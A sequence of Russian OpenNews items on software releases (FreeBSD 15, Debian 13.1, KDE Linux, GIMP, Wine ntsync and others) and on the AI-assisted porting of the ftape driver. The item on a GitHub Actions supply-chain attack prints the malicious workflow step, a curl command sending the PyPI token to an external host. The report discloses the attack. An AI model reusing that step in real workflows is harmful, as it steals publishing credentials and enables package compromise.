Начиная с ветки FreeBSD 15 время сопровождения значительных веток после формирования первого релиза (15.0) сокращено с 5 до 4 лет, а новые значительные ветки будут формироваться раз в два года. Промежуточные выпуски (15.1, 15.2, 15.3) будут разрабатываться в рамках фиксированного цикла разработки, подразумевающего публикацию новых версий в одной ветке примерно через каждые 6 месяцев, а не раз в год как было до сих пор. C учётом одновременного сопровождения двух разных значительных веток, новый промежуточный выпуск будет публиковаться раз в 3 месяца (15.4, 16.1, 15.5, 16.2 и т.п.), за исключением подготовки первых релизов новых значительных веток, перед которыми будет 6-месячный перерыв в релизах (например, релиз 15.3 будет сформирован в июне 2027 года, 16.0 в декабре 2027, 15.4 - в марте 2028, 16.1 - в июне 2028).

В официальном анонсе альфа-версии FreeBSD 15 присутствует ссылка на примечание к релизу (копия) с некорректным списком изменений. Упомянутый список лишён смысла, так содержит не специфичные для ветки FreeBSD 15 изменения, а изменения в ветке 14.x относительно выпуска 14.0, т.е. в него помещены старые данные, перенесённые из ранее опубликованных примечаний к релизам 14.1, 14.2 и 14.3.

Некоторые изменения в ветке FreeBSD 15, отмеченные в Git:

• Прекращено формирование установочных образов и сборок бинарных пакетов для 32-разрядных архитектур. Возможность сборки 32-разрядных программ и использования режима COMPAT_FREEBSD32 для запуска 32-разрядных исполняемых файлов в окружении на базе 64-разрядного ядра сохранится как минимум до конца жизненного цикла ветки FreeBSD 16.
• Удалён менеджер логических томов gvinum, который использовался для программных RAID. Разработка Gvinum остановилась около 15 лет назад, при том, что в коде имеется ряд известных проблем, которые никто так и не взялся исправить. Вместо gvinum рекомендовано использовать gconcat, gmirror, gstripe, graid или zfs.
• Намечен к удалению драйвер agp (Accelerated Graphics Port), необходимый для работы многих драйверов для старых видеокарт.
• Состояние DRM-драйверов i915 и amdgpu синхронизировано с ядром Linux 6.9.
• Добавлена поддержка именованных атрибутов файлов (расширенных атрибутов в стиле Solaris), которые планируют поддерживать в качестве альтернативного механизма управления расширенными атрибутами, доступного для ZFS и NFSv4. Отличия от традиционных для FreeBSD и Linux методов работы с расширенными атрибутами сводится к представлению атрибутов в служебной директории, не видимой в основном пространстве имён ФС и ассоциированной с файлом. Работа с атрибутами производится как с обычными файлами, например, для определения списка атрибутов можно выполнить функцию readdir().
• Реализованы системные вызовы c реализацией механизма inotify для отслеживания изменений в файловых системах.
• Добавлена утилита sndctl для управления настройками звуковых карт.
• Добавлена утилита mididump для дампа событий MIDI 1.0 в режиме реального времени.
• Объявлен готовым к применению модуль mac_do, позволяющий задавать политики, разрешающие непривилегированным пользователям изменять учётные данные процессов. Для запуска команд под другим пользователем подготовлена утилита mdo похожая на утилиту su, но не требующая suid root.
• Включена по умолчанию реализация протокола TLS на стороне ядра (KTLS).
• В гипервизор bhyve добавлен новый сетевой бэкенд "slirp", использующий библиотеку libslirp с реализацией сетевого стека в пространстве пользователя. Бэкенд "slirp" позволяет организовать доступ к сети гостевой системы из хост окружения без отдельной настройки сети на стороне хоста.
• Поведение системных вызовов setgroups, getgroups и initgroups при обработке групп пользователей приближено к другим платформам (отличие реализации во FreeBSD сводилось к хранению эффективного идентификатора группы процессов в нулевом элементе массива со списком групп).
• Реализация Kerberos в основном составе FreeBSD заменена c Heimdal Kerberos на MIT Kerberos. Для возвращения Heimdal Kerberos при сборке можно использовать флаг WITHOUT_MITKRB5. Во FreeBSD 16 поддержка сборки Heimdal Kerberos будет удалена.
• В NFS добавлена поддержка операции CLONE, определённой в спецификации NFSv4.2 и позволяющей организовать быстрое копирование файлов через клонирование блоков на сервере. Режим пока работает только при экспорте через NFS разделов ZFS.
• Повышена надёжность работы разделов с ФС UFS, содержащих более 2,000,000,000 inode.
• На системах amd64 добавлена возможность использования более 4TB ОЗУ.
• Объявлена устаревшей функция readdir_r.
• В SNMP-сервере bsnmpd прекращена поддержка транспорта UDP.
• Добавлен драйвер ufshci для поддержки контроллеров систем хранения с интерфейсом UFSHCI (Universal Flash Storage Host Controller Interface).
• По умолчанию отключена и объявлена устаревшей настройка net.inet.tcp.nolocaltimewait, т.е. возвращено создание по умолчанию TIME_WAIT-записей для TCP-соединений, разорванных на стороне локальной системы. Для настройки времени нахождения соединения в состоянии TIME_WAIT добавлен новый sysctl net.inet.tcp.msl_local.
• По умолчанию отключена поддержка создания сетевых соединений к localhost, указывая INADDR_ANY. Для возвращения поддержки можно выставить sysctl net.inet.ip.connect_inaddr_wild sysctl в значение 1.
• Sysctl net.link.bridge.member_ifaddrs по умолчанию выставлен в 0, т.е. в сетевые мосты можно добавлять интерфейсы без IP-адресов.
• В реализации ФС UFS1 решена проблема 2038 года (можно использовать даты до 2106 года).
• Прекращена генерация хостовых ключей RSA для SSH и EC2 AMI.
• Добавлена опция сетевых сокетов SO_SPLICE для объединения TCP-соединений (подобие прокси, работающего без копирования данных в пространство пользователя).
• В утилите grep по умолчанию отключён обход символических ссылок при рекурсивном поиске.
• Добавлен модуль ядра nvmftа для поддержки контроллеров NVMe over Fabric и утилита nvmecontrol для подключения к внешнему контроллеру NVMe over Fabric.
• В утилиту date добавлена поддержка вывода времени с наносекундной точностью, например, "date -Ins" выведет "2024-04-22T12:20:28,763742224+02:00".
• В jail добавлена поддержка опции zfs.dataset для добавления в изолированное jail-окружение раздела, снапшота или клона ZFS.
• В tty по умолчанию выставлен флаг IUTF8, при котором корректно работает удаление символов UTF-8 при нажатии Backspace.
• Утилита dialog заменена на bsddialog.
• Обновлены версии Lua 5.4.8, jemalloc 5.3.0, Awk 04082025, unicode 16.0.0, CLDR 45.0.0, byacc 20240109, ncurses 6.5.

1. Главная ссылка к новости
2. OpenNews: Отчёт о развитии FreeBSD за второй квартал 2025 года
3. OpenNews: Релиз FreeBSD 14.3
4. OpenNews: Для FreeBSD развивают опциональную поддержку компонентов базовой системы на Rust
5. OpenNews: Отчёт FreeBSD по улучшению юзабилити и работы на ноутбуках
6. OpenNews: FreeBSD переходит на сокращённый цикл подготовки релизов

Портирование примечательно тем, что оно было выполнено почти целиком силами AI-ассистента Claude Code. В итоге был получен полностью рабочий драйвер, способный собираться и функционировать на системах с ядрами 6.8 и новее. Портирование было выполнено в три этапа. На первом этапе AI-ассистенту была поставлена задача модификации кода драйвера, который мог компилироваться только с ядрами 2.4, для сборки с новыми версиями ядра. AI успешно заменил в драйвере обращения к устаревшим функциям ядра на актуальные вызовы, откорректировал использование структур данных и устранил все ошибки, возникавшие при сборке.

На втором этапе была поставлена задача преобразования драйвера из встроенной в ядро формы, в вариант, способный работать в виде загружаемого модуля ядра. AI-ассистент подготовил загружаемый модуль. На третьем этапе путём передачи AI-ассистенту dmesg-вывода с информацией об ошибках и проблемах, возникавших в процессе работы, а также эталонных отладочных dmesg-сообщений от рабочего старого драйвера, порт был приведён в работоспособное состояние, позволяющее определять наличие ленточного накопителя и извлекать содержимое картриджей.

Работу, которая вначале казалась трудновыполнимой и требующей нескольких недель изучения документации, удалось проделать за два вечера. Для создания рабочего модуля потребовалось три запроса, несколько обсуждений и пару ручных правок кода. При этом Дмитрий отмечает, что не стоит переоценивать AI-помощники, которые лишь инструменты, требующие осмысленного взаимодействия. Дмитрий знает язык Си и имеет представление о модулях ядра, но заставить AI-помощник действовать в нужном направлении без знаний внутреннего устройства модулей ядра по его мнению было бы невозможно.

При формулировании задачи требуется знать специфику и использовать профессиональную терминологию, чётко формулируя каркас реализуемой функции и определяя пустоты в этом каркасе, которые должен заполнить AI. Также необходимо изучить сильные и слабые стороны AI-ассистентов, чтобы не давать им задачи, с которыми они не смогут хорошо справиться. Для достижения результата Дмитрий советует рассматривать AI-ассистент как усилитель собственных навыков, а общение с ним как сотрудничество с подчинённым инженером, который сделает всё что сказано, стремится угодить, самоуверен, но признаёт ошибки. Принятие решений, задание правил и ответственность за результат остаются за человеком.

Драйвер ftape предназначен для работы с ленточными накопителями, использующими картриджи QIC, в которых применяется собственный проприетарный формат кодирования и сжатия информации. Подобные устройства часто использовались в 1990-е годы для резервного копирования. Поддерживаемые драйвером ленточные накопители не требовали дорогого SCSI-контроллера и подключались к типовому контроллеру Floppy-дисков (например, устройства Colorado Jumbo 250 и Ditto Max) или параллельному порту (Trakker, Iomega Ditto).

Ftape был единственным драйвером, способным извлекать дампы картриджей в raw-режиме, что позволяло вначале загрузить полный дамп, а уже потом разбираться с раскодированием формата и извлечением файлов. При этом подключение накопителя через контроллер Floppy-дисков напоминало хак, так как драйверу приходилось "обманывать" контроллер, рассчитанный на работу только с Floppy-дисками, для передачи команд и организации взаимодействия с ленточным накопителем.

Ранее для извлечения информации c ленточных картриджей Дмитрию приходилось использовать отдельный компьютер с CentOS 3.5 и ядром 2.4.21. После портирования драйвера архивы стало возможно извлекать на ПК c современными дистрибутивами Linux, такими как Ubuntu 24.04. Поддерживается 32- и 64-разрядные сборки, но для работы с устройствами, подключаемыми к контроллеру Floppy-дисков, требуется материнская плата с подобным контроллером.

В качестве областей применения драйвера упоминается восстановление информации со старых ленточных картриджей и использование в проектах по воссозданию ретрокомпьютеров. В дальнейшем на базе драйвера намерены подготовить инструментарий для низкоуровневого извлечения данных со сбойных ленточных накопителей, использующий raw-дампы для восстановления информации, независимо от состояния таблиц разделов или наличия сбоев коррекции ошибок.

1. Главная ссылка к новости
2. OpenNews: Эксперимент по использованию AI для перевода приложения с GTK2 и OpenGL на GTK4 и Vulkan
3. OpenNews: Представлены правила для AI-ассистентов, применяемых при разработке ядра Linux
4. OpenNews: Оценка эффективности применения AI-инструментов выявила замедление, а не ускорение разработки
5. OpenNews: Браузерные дополнения вовлекают в построение распределённой сети скрапинга для AI-ботов
6. OpenNews: Компания SUSE открыла AI-модель для анализа лицензионной чистоты кода

Среди изменений:

• Оптимизирован интерпретатор инструкций TrueType, который стал загружать глифы на 15% быстрее.
• Ускорена обработка вариативных шрифтов.
• На современных 64-разрядных платформах на 5-10% ускорена загрузка глифов TrueType и CFF.
• В драйвере BDF на 75% сокращено время загрузки шрифтов.
• В 3.5 раза возросла производительность обработки таблиц кернинга 'GPOS'.
• В авто-хинтере при небольших размерах символов улучшена отрисовка глифов тильды акцента и разделение диакритических и базовых глифов.
• Добавлен конфигурационный макрос "FT_CONFIG_OPTION_USE_HARFBUZZ_DYNAMIC" для динамической загрузки библиотеки компоновки глифов HarfBuzz.
• В полностью растровых шрифтах TrueType теперь игнорируется флаг FT_LOAD_NO_BITMAP и выполняется загрузка битовых карт вместо вывода ошибки.

1. Главная ссылка к новости
2. OpenNews: Уязвимость во FreeType, позволяющая выполнить код при обработке шрифтов
3. OpenNews: Релиз шрифтового движка FreeType 2.13
4. OpenNews: В Fedora 34 намечен перевод FreeType на HarfBuzz для улучшения хинтинга
5. OpenNews: Уязвимость во FreeType, эксплуатируемая через TTF-шрифт и затрагивающая браузеры
6. OpenNews: Браузер Chrome переведён на шрифтовой движок Skrifa, написанный на Rust

Для управления окнами в Budgie используется оконный менеджер Budgie Window Manager (BWM), являющийся расширенной модификацией базового плагина Mutter. Основу Budgie составляет панель, близкая по организации работы к классическим панелям рабочего стола. Все элементы панели являются апплетами, что позволяет гибко настраивать состав, менять размещение и заменять реализации основных элементов панели на свой вкус. Среди доступных апплетов можно отметить классическое меню приложений, систему переключения задач, область со списком открытых окон, просмотр виртуальных рабочих столов, индикатор управления питанием, апплет управления уровнем громкости, индикатор состояния системы и часы.

Разработчики намеревались сформировать значительный релиз Budgie 10.10 в первом квартале 2025 года. В данном выпуске планировалось полностью отказаться от поддержки X11 и оставить только возможность работы в окружениях на базе протокола Wayland. Тем не менее, данная ветка всё ещё не готова к релизу, одним из критериев для которого упоминалось достижение паритета в функциональности апплетов со старым окружением на базе X11. После релиза Budgie 10.10, серию 10.x переведут в режим сопровождения, а все ресурсы направят на развитие ветки Budgie 11, примечательной отделением функциональности рабочего стола от слоя, обеспечивающего визуализацию и вывод информации.

Обновление Budgie 10.9.3 примечательно синхронизацией c изменениями в грядущем релизе GNOME 49, запланированном на 17 сентября. Для управления настройками в Budgie применяется компонент gnome-settings-daemon, в который в GNOME 49 внесены изменения, нарушающие обратную совместимость. Из плагина Power в GNOME Shell перенесён код для управления подсветкой экрана, а из плагина MediaKeys - код поддержки мультимедийных клавиш изменения яркости. Также из gnome-settings-daemon удалён плагин для графических планшетов Wacom, функциональность которого теперь интегрирована в композитный менеджер Mutter.

Для обеспечения работы после урезания функциональности разработчики Budgie создали форк gnome-settings-daemon, нацеленный на сохранение старого состояния компонентов MediaKeys, Power и Wacom. За исключение данных компонентов, которые поставляются в форме отдельных плагинов (bsd-media-keys, bsd-power и bsd-wacom), и возвращения desktop-файлов для их автозапуска, остальной код gnome-settings-daemon полностью синхронизирован с кодовой базой GNOME. Из изменений в самом Budgie отмечается адаптация к новому API библиотеки libxfce4windowing, изменениям в обработке клавиши "overlay-key" (по умолчанию "Super") в композитном менеджере Mutter и удалению компактных классов в Vala 0.56.18.

1. Главная ссылка к новости
2. OpenNews: В среде рабочего стола Budgie 10.10 будет оставлена только поддержка Wayland
3. OpenNews: Выпуск среды рабочего стола Budgie 10.9 с начальной поддержкой Wayland
4. OpenNews: Выпуск окружения рабочего стола Budgie 10.8
5. OpenNews: План развития пользовательского окружения Budgie после превращения в независимый проект
6. OpenNews: Рабочий стол Budgie переходит с GTK на библиотеки EFL от проекта Enlightenment

Для формирования сборок используются пакетные базы Debian и Ubuntu, но все компоненты полностью пересобирается при помощи собственной сборочной системы с включением оптимизаций для уменьшения размера, увеличения производительности и применения дополнительных механизмов защиты. Например, раздел /var/log монтируется с использованием zram и хранится в ОЗУ в сжатом виде со сбросом данных на накопитель раз в день или при завершении работы. Раздел /tmp монтируется при помощи tmpfs.

Проектом поддерживается более 30 вариантов сборок ядра Linux для разных платформ ARM и ARM64. Предоставляется SDK для упрощения создания своих системных образов, пакетов и редакций дистрибутива. Для подкачки используется ZSWAP. При входе по SSH предоставляется опция для использования двухфакторной аутентификации. В состав входит эмулятор box64, позволяющий запускать программы, собранные для процессоров на базе архитектуры x86. Предлагаются готовые пакеты для запуска пользовательских окружений на базе KDE, GNOME, Budgie, Cinnamon, i3wm, Mate, Xfce и Xmonad.

Основные изменения в Armbian 25.8:

• Обеспечена официальная поддержка плат Mekotronics R58 HD и NanoPi R3S LTS.
• Добавлена поддержка плат, сопровождаемых сообществом: CAINIAO CNIoT-CORE, KickPi K2B, Radxa Cubie A5E, Banana Pi R4 и Orange Pi 5 Pro.
• Ядро Linux для большинства плат обновлено до версии 6.16 в ветках EDGE. В ветках STABLE используется ядро 6.12 LTS. Обновлён загрузчик U-Boot 2025.07 и инструментарий ATF 2.13 (Arm Trusted Firmware).
• Добавлена поддержка релиза Debian 13, проведена стабилизация сборок на базе Debian 13.
• В сборочный инструментарий добавлена поддержка архитектуры LoongArch64.
• Продолжено развитие утилиты armbian-config, применяемой для настройки системы после установки. Улучшена поддержка VPN WireGuard, расширены настройки связанные с маршрутизацией в локальных сетях и конфигурированием клиентских систем. Улучшена интеграция с системой блокирования рекламы Pi-hole.
• Включена поддержка термодатчиков для платы Rock-5C.
• Добавлена поддержка звуковой подсистемы платы RockPi-S.
• Налажена работа Wake-on-LAN на платах Helios4.
• Улучшены драйверы для плат Realtek RTL8822CS, Innosilicon USB3 PHY и NanoPi M6.
• Решены проблемы с подключением экранов через интерфейс DSI (Display Serial Interface) на платах Raspberry Pi 5.

Дополнительно можно отметить формирование выпуска DietPi 9.16, дистрибутива для одноплатных ПК на базе архитектур ARM и RISC-V, таких как Raspberry Pi, Orange Pi, NanoPi, BananaPi, BeagleBone Black, Rock64, Rock Pi, Quartz64, Pine64, Asus Tinker, Odroid и VisionFive 2. Дистрибутив построен на пакетной базе Debian и доступен в сборках для более, чем 50 плат. DietPi также может применяться для создания компактных окружений для виртуальных машин и обычных ПК на базе архитектуры x86_64. Сборки для плат отличаются небольшим размером (в среднем 130 МБ) по сравнению с Raspberry Pi OS и Armbian. Инструментарий для сборки и сопровождения дистрибутива распространяется под лицензией GPLv2.

Проект оптимизирован для минимального потребления ресурсов и развивает несколько собственных утилит: интерфейс для установки приложений DietPi-Software, конфигуратор DietPi-Config, система резервного копирования DietPi-Backup, механизм ведения временных логов DietPi-Ramlog (также поддерживается rsyslog), интерфейс для установки приоритетов выполнения процессов DietPi-Services и система доставки обновлений DietPi-Update. Утилиты предоставляют консольный интерфейс пользователя с меню и диалогами на базе whiptail. Поддерживается режим полной автоматизации установки, позволяющий провести инсталляцию на платы без участия пользователя.

Среди изменений в DietPi 9.16:

• Добавлена начальная поддержка будущего выпуска Debian 14, развитие которого началось в ветке Debian Testing. Началось формирование сборок на базе Debian 14.
• При выполнении операций с пакетами убран запуск команды обновления индексов "apt update", если /etc/apt/sources.list и специфичные для архитектур индексы изменялись менее часа назад.
• В скриптах и функциях G_* при необходимости выполнения привилегированных операций реализован встроенный перезапуск с использованием sudo, не требующий ручного ввода команд в форме "sudo dietpi-software".
• В сборках для плат Raspberry Pi при первой загрузке теперь по умолчанию активируется адаптер UART.
• Для плат ROCK Pi S добавлены настройки для переключения порта USB-C между режимами USB-хоста и OTG.
• В утилите dietpi-software для систем на базе архитектуры RISC-V реализованы опции для использования Docker Compose, Snapcast и Amiberry. Для всех архитектур и версий Debian добавлена возможность установки системы домашней автоматизации Domoticz. В сборки для Raspberry Pi на базе Debian 12 добавлен пакет с медиацентром Kodi 21. Добавлена возможность установки Nextcloud Talk, Synapse и WireGuard в автоматическом режиме при первой загрузке.

1. Главная ссылка к новости
2. OpenNews: Выпуск Armbian 25.5 и DietPi 9.13, дистрибутивов для одноплатных компьютеров
3. OpenNews: Обновление дистрибутива OpenWrt 24.10.2
4. OpenNews: Для плат Raspberry Pi опубликован генератор системных образов rpi-image-gen
5. OpenNews: Новая версия дистрибутива Raspberry Pi OS

Rust Coreutils применяется в дистрибутивах AerynOS (Serpent OS) и Apertis, а также будет задействован по умолчанию в осеннем выпуске Ubuntu 25.10. В отличие от GNU Coreutils реализация на Rust распространяется под пермиссивной лицензией MIT, вместо копилефт-лицензии GPL. Дополнительно той же командой разработчиков развиваются написанные на Rust аналоги наборов утилит util-linux, diffutils, findutils и procps, а также программ sed и login.

В новой версии Rust Coreutils:

• Пакет признан полностью готовым для рабочего применения в Ubuntu. Устранены все проблемы, мешавшие переходу Ubuntu по умолчанию на Rust Coreutils.
• Добавлена поддержка локализации и интернационализации. Введена в строй инфрастурктура для поддержания переводов сообщений на разные языки. Учтены параметры локали при форматировании вывода и начат перевод на разные языки сообщений об ошибках. Для поддержки многоязычности задействована система локализации Fluent, развиваемая Mozilla и используемая в Firefox.
• Добавлена поддержка Unicode. Символы Unicode, в том числе emoji, теперь могут применяться при обработке содержимого и параметров, например, в качестве разделителей полей: 'echo "🍔🍟🥤" | cut -d"🍟" -f1').
• Проведена оптимизация производительности утилит tr, sort и cat. Производительность утилиты tr повышена в 15 раз - ранее данная утилита была медленнее GNU tr в 9.8 раз, а теперь быстрее в 1.58 раза.
• Улучшена совместимость с эталонным тестовым набором GNU Coreutils, при прохождении которого успешно выполнено 538 тестов (в прошлой версии 522), 52 (65) теста завершилось неудачей, а 27 (31) тест был пропущен.
• Улучшена совместимость с GNU Coreutils для утилит date, du, fmt, ls и sort.
• Расширены возможности, устранены проблемы и добавлены недостающие опции для утилит basenc, basename, cat, chmod, chown, cksum, cp, split, date, dd, du, echo, env, expr, factor, fold, hashsum, head, install, ln, logname, ls, mkdir, mkfifo, mktemp, more, mv, nice, nl, od, pr, printf, pwd, realpath, rm, shred, sort, stat, stdbuf, stty, sync, tail, tee, timeout, touch, tr, uname, unexpand, uptime, users и who.

1. Главная ссылка к новости
2. OpenNews: GCC-бэкенд достиг возможности полной раскрутки компилятора rustc. Выпуск Rust Coreutils 0.1.0
3. OpenNews: Выпуск утилит GNU grep 3.12, gzip 1.14, diffutils 3.12 и coreutils 9.7
4. OpenNews: В Ubuntu 25.10 решено заменить GNU Coreutils на uutils, написанные на Rust
5. OpenNews: Выпуск uutils 0.0.29, варианта GNU Coreutils на языке Rust
6. OpenNews: В Ubuntu по умолчанию задействован sudo-rs, написанный на Rust

Дистрибутив основан на пакетной базе Arch Linux, но оформлен в форме неделимого образа, не применяющего разбивку на отдельные пакеты, монтируемого в режиме только для чтения и обновляемого атомарно. Компоненты, помимо базового системного окружения, собраны из исходного кода при помощи kde-builder или поставляются в форме пакетов Flatpak. Дистрибутивом поддерживаются повторяемые сборки, позволяющие любому желающему верифицировать процесс сборки дистрибутива. Все пользовательские (/home) и изменяемые системные данные хранятся в зашифрованных разделах. В качестве загрузчика задействован systemd-boot, поддерживающий загрузку только в режиме EFI.

Для обновления используются два дисковых раздела - обновление загружается в пассивный раздел, который после перезагрузки становится активным, а прошлый активный раздел переводится в пассивный режим и ожидает установки следующего обновления. В случае возникновения проблем после установки обновления предоставляется возможность отката на прошлое состояние системы. Переключение между разными состояниями системы реализовано через механизм снапшотов Btrfs. Для установки обновлений с использованием атомарного механизма замены разделов применяется компонент systemd-sysupdate и утилита updatectl.

Система отделена от приложений - дополнительные приложения могут быть установлены в домашний каталог в форматах Flatpak, AppImage, Homebrew или Snap. Кроме того, в состав входят инструментарии Distrobox и Toolbox, позволяющие создавать в домашнем каталоге контейнеры для установки произвольных пакетов из других дистрибутивов. Пользователь также может использовать утилиту systemd-sysext для установки образов расширения системы (System Extension), содержимое которых накладывается на иерархию /usr/ при помощи OverlayFS.

Альфа выпуск продолжает развитие сформированной в начале августа редакции KDE Linux Testing Edition, рассчитанной на тестирование, контроль качества и отслеживание процесса разработки следующего релиза KDE. Редакция ориентирована на использование разработчиками KDE и пользователями, желающими принять участие в контроле качества, проверке новых возможностей и выявлении ошибок. В дальнейшем планируют сформировать редакцию для энтузиастов и опытных пользователей (Enthusiast Edition), предоставляющую доступ к самым свежим релизам и бета-версиям KDE Plasma, а также стабильную сборку (Stable Edition), предлагающую финальные релизы после проведения дополнительного тестирования и стабилизации.

Из ограничений альфа-версии отмечается поддержка только систем с UEFI, отсутствие возможности загрузки в режиме UEFI Secure Boot, невозможность загрузки новых модулей ядра во время работы, недоделанный интерфейс для обновления системы и приложений в формате Flatpak, отсутствие поддержки старых GPU NVIDIA (поддерживаются только GPU на базе микроархитектуры Turing (GTX 16xx) и новее так как лицензионные ограничения не позволяют включить в состав образа проприетарные модули с поддержкой старых GPU). Для работы доступен только графический сеанс на базе Wayland.

1. Главная ссылка к новости
2. OpenNews: Проект KDE развивает собственный дистрибутив KDE Linux
3. OpenNews: Проект KDE опубликовал дистрибутив KDE Linux Testing Edition
4. OpenNews: Выпуск KDE Gear 25.08, набора приложений от проекта KDE
5. OpenNews: В KDE появился мастер начальной настройки
6. OpenNews: Дистрибутив GNOME OS перешёл на стадию тестирования на реальном оборудовании

Из изменений в Debian 13.1 можно отметить обновление до свежих стабильных версий пакетов dpdk, galera, git, glib, gnome-online-accounts, gnome-shell, gssdp, libadwaita-1, librepo, mariadb, mozjs128, network-manager-openvpn, pcre2, postfix, postgresql, ptyxis, qemu, samba, systemd. Из дистрибутива удалён пакетный менеджер guix, который остался без сопровождения и содержит проблемы с безопасностью.

Для загрузки и установки "с нуля" в ближайшие часы будут подготовлены установочные сборки c Debian 13.1. Системы, установленные ранее и поддерживаемые в актуальном состоянии, получают обновления, присутствующие в Debian 13.1, через штатную систему установки обновлений. Исправления проблем безопасности, включённые в новые выпуски Debian, доступны пользователям по мере выхода обновлений через сервис security.debian.org.

Одновременно доступен новый выпуск предыдущей стабильной ветки Debian 12.12, в который включено 135 обновлений с устранением проблем со стабильностью и 83 обновления с устранением уязвимостей. Обновлены до свежих стабильных версий пакеты apache2, clamav, dpdk, galera, libsoup3, llvm-toolchain, mariadb, openssl, postgresql, rar, rustc-web, systemd, usb.ids, wireless-regdb. Удалён пакет guix.

1. Главная ссылка к новости
2. OpenNews: Релиз Debian 13
3. OpenNews: Релиз Debian GNU/Hurd 2025

GitHub Actions даёт возможность разработчикам кода прикреплять обработчики для автоматизации различных операций в GitHub. Например, при помощи GitHub Actions можно выполнить определённые проверки и тесты при совершении коммитов или автоматизировать обработку новых Issues. Вредоносный обработчик распространялся под именем "Github Actions Security" и включал в секции "run" команду "curl", отправляющую содержимое переменных окружения на внешний хост при запуске задач в окружении непрерывной интеграции. Вредоносный коммит добавлялся с учётных записей мэйнтейнеров проектов, которые, вероятно, до этого были взломаны или стали жертвой фишинга.

Атака выявлена после разбора аномальной активности, связанной с пакетом FastUUID, предоставляющим Python-обвязку над Rust-библиотекой UUID. Пакет FastUUID, для которого за последнюю неделю зафиксировано почти 1.2 миллиона загрузок, используется в качестве зависимости в популярном проекте LiteLLM, насчитывающем в PyPI более 5 миллионов загрузок в неделю. Анализ изменений в репозитории FastUUID показал, что 2 сентября мэйнтейнер проекта добавил коммит с новым обработчиком Github Action, в котором содержался код для отправки токена к репозиторию PyPI на внешний хост.

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' https://bold-dhawan.45-139-104-115.plesk.page

Проблему удалось выявить до того как злоумышленники воспользовались перехваченным токеном - публикации вредоносных изменений или модифицированных версий пакета в PyPI для FastUUID не зафиксировано. Похожие подстановки Github Action выявлены ещё в 816 репозиториях, владельцам которых, а также администрации PyPI, GitHub, NPM и DockerHub, направлены уведомления. По состоянию на вчерашний вечер вредоносные коммиты были отменены примерно в 100 репозиториях. В настоящее время при поиске в GitHub определяется 671 коммит с вредоносным Github Action.

1. Главная ссылка к новости
2. OpenNews: Google представил проект OSS Rebuild для выявления скрытых изменений в пакетах
3. OpenNews: Компрометация GitHub Actions-обработчика changed-files, применяемого в 23 тысячах репозиториев
4. OpenNews: Ошибка в обработчике GitHub Actions привела к публикации вредоносных релизов Ultralytics
5. OpenNews: GitHub обновил GPG-ключи из-за уязвимости, приводящей к утечке переменных окружения
6. OpenNews: Атака на инфраструктуру PyTorch, компрометирующая репозиторий и релизы

Значительный прирост производительности достигается благодаря избавлению от накладных расходов, связанных с применением RPC в пространстве пользователя. Например, при использовании драйвера ntsync по сравнению с реализацией примитивов синхронизации NT в пространстве пользователя максимальный FPS в игре Dirt 3 увеличился на 678%, в игре Resident Evil 2 - на 196%, Tiny Tina's Wonderlands - на 177%, Lara Croft: Temple of Osiris - на 131%, Call of Juarez - на 125%, The Crew - на 96%, Forza Horizon 5 - на 48%, Anger Foot - на 43% (замеры сделаны в сравнении с wine-sync, не с esync/fsync).

Для задействования оптимизированных примитивов синхронизации в Wine необходимо включить модуль ядра ntsync, который отключён по умолчанию. Для активации автозапуска модуля ntsync при каждом перезапуске системы, можно добавить файл конфигурации /etc/modules-load.d/ntsync.conf, содержащий строку "ntsync" и перезапустить систему. Или для однократного запуска вручную загрузить модуль командой "sudo modprobe ntsync", но в таком случае после перезапуска системы, модуль придётся запускать вручную каждый раз заново. Для работы требуется как минимум ядро Linux 6.14.

Чтобы убедиться, что ntsync действительно работает, необходимо что-нибудь запустить в Wine. Например, достаточно выполнить команду "winecfg", после чего запустить "lsof /dev/ntsync" и убедиться, что в выводе присутствуют запущенные сейчас процессы wine, использующие ntsync. Например:

   $ lsof /dev/ntsync

   COMMAND      PID USER FD   TYPE DEVICE SIZE/OFF NODE NAME
   start.exe 658466 user 12r   CHR 10,260      0t0  630 /dev/ntsync
   services. 658474 user 11r   CHR 10,260      0t0  630 /dev/ntsync
   explorer. 658484 user 11r   CHR 10,260      0t0  630 /dev/ntsync
   winedevic 658499 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   svchost.e 658552 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   plugplay. 658557 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   winedevic 658605 user 10r   CHR 10,260      0t0  630 /dev/ntsync
   conhost.e 658623 user 11r   CHR 10,260      0t0  630 /dev/ntsync
   winecfg.e 658625 user 11r   CHR 10,260      0t0  630 /dev/ntsync

1. Главная ссылка к новости
2. OpenNews: Arch Linux перешёл на 64-разрядные сборки Wine (WoW64)
3. OpenNews: Выпуск Wine-wayland 10.5
4. OpenNews: Новые версии Wine 9.2 и Winlator 5.0. Для ядра Linux предложен драйвер ntsync
5. OpenNews: Релиз ядра Linux 6.14
6. OpenNews: Выпуск Wine 10.14 и Wine staging 10.14

Среди изменений в GIMP 3.1.4:

• Добавлена поддержка слоёв-ссылок (Link layer), позволяющих прикрепить внешние файлы с изображениями в качестве отдельных слоёв. В GIMP к слоям-ссылкам применяется режим недеструктивного редактирования, т.е. манипуляции со слоями-ссылками не влияют на состояние привязанных исходных изображений.

  Например, если добавить SVG-файл как слой-ссылку, то после редактирования этого файла в векторном графическом редакторе Inkscape, содержимое слоя в GIMP будет автоматически синхронизировано с состоянием отредактированного файла. При этом если в GIMP отмасштабировать или повернуть содержимое слоя-ссылки, то данные изменения не повлияют на качество исходного изображения.

  В будущем планируют добавить возможность привязки не только целых изображений, но отдельных слоёв, т.е. как слои-ссылки можно будет привязать выбранные слои из отдельного XCF-файла.
  
  

• Добавлена поддержка векторных слоёв (Vector layer), позволяющих создавать фигуры с заданными свойствами заливки и обводки. Данные хранятся в векторном виде, что позволяет в любой момент изменить контуры фигур (path), выбрать другой цвет заливки или обводки и применить к слою инструменты трансформации в недеструктивном режиме. Для создания векторного слоя следует создать фигуру при помощи инструмента "Контуры" (Path) и нажать кнопку генерации векторного слоя для фигуры, после чего можно, например, повернуть или масштабировать векторный слой без потери качества исходной фигуры.
• Добавлен GEGL Filter Browser, интерфейс для навигации по фильтрам на базе библиотеки GEGL (Generic Graphics Library). При помощи GEGL Filter Browser можно посмотреть список доступных операций GEGL (фильтров) и информацию по их использованию.
